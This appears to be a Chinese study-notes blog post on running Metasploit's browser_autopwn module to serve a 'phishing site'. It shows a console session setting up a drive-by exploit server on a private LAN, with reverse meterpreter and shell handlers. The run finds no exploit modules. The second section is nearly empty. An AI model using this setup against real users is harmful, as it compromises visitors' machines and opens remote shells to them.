天天看點
傳回

使用metasploit制作釣魚網站——browser autopwn攻擊前言一、browser autopwn攻擊二、對網站的用戶端進行滲透

文章目錄

  • 前言
  • 一、browser autopwn攻擊
  • 二、對網站的用戶端進行滲透

前言

使用metasploit對用戶端滲透測試

一、browser autopwn攻擊 

msf6 > use auxiliary/server/browser_autopwn
msf6 auxiliary(server/browser_autopwn) > options

Module options (auxiliary/server/browser_autopwn):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   LHOST                     yes       The IP address to use for reverse-connect payloads
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to l
                                       isten on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Auxiliary action:

   Name       Description
   ----       -----------
   WebServer  Start a bunch of modules and direct clients to appropriate exploits


msf6 auxiliary(server/browser_autopwn) > set rhosts 192.168.1.115
rhosts => 192.168.1.115
msf6 auxiliary(server/browser_autopwn) > set srvport 80
srvport => 80
msf6 auxiliary(server/browser_autopwn) > set lhost 192.168.1.113
lhost => 192.168.1.113
msf6 auxiliary(server/browser_autopwn) > set uripath /
uripath => /
msf6 auxiliary(server/browser_autopwn) > exploit
[*] Running module against 192.168.1.115
[*] Auxiliary module execution completed

[*] Setup
msf6 auxiliary(server/browser_autopwn) > 
[*] Starting exploit modules on host 192.168.1.113...
.....
[*] Starting handler for windows/meterpreter/reverse_tcp on port 3333
[*] Starting handler for generic/shell_reverse_tcp on port 6666
[*] Started reverse TCP handler on 192.168.1.113:3333 
[*] Starting handler for java/meterpreter/reverse_tcp on port 7777
[*] Started reverse TCP handler on 192.168.1.113:6666 
[*] Started reverse TCP handler on 192.168.1.113:7777 

[*] --- Done, found 0 exploit modules

[-] No exploits, check your MATCH and EXCLUDE settings
[*] Cleaning up exploits...

啟動子產品後,任何一個連接配接到系統80端口的目标都會遭到滲透攻擊

二、對網站的用戶端進行滲透

metasploit對網站客戶進行滲透測試

精通Metasploit學習筆記 kali linux metasploit 滲透測試
上一篇: ZED入門:利用RTAB-MAP做SLAM
下一篇: 基于Rtab_map的輪速機器人自動導航(3)——機器人的指令控制

繼續閱讀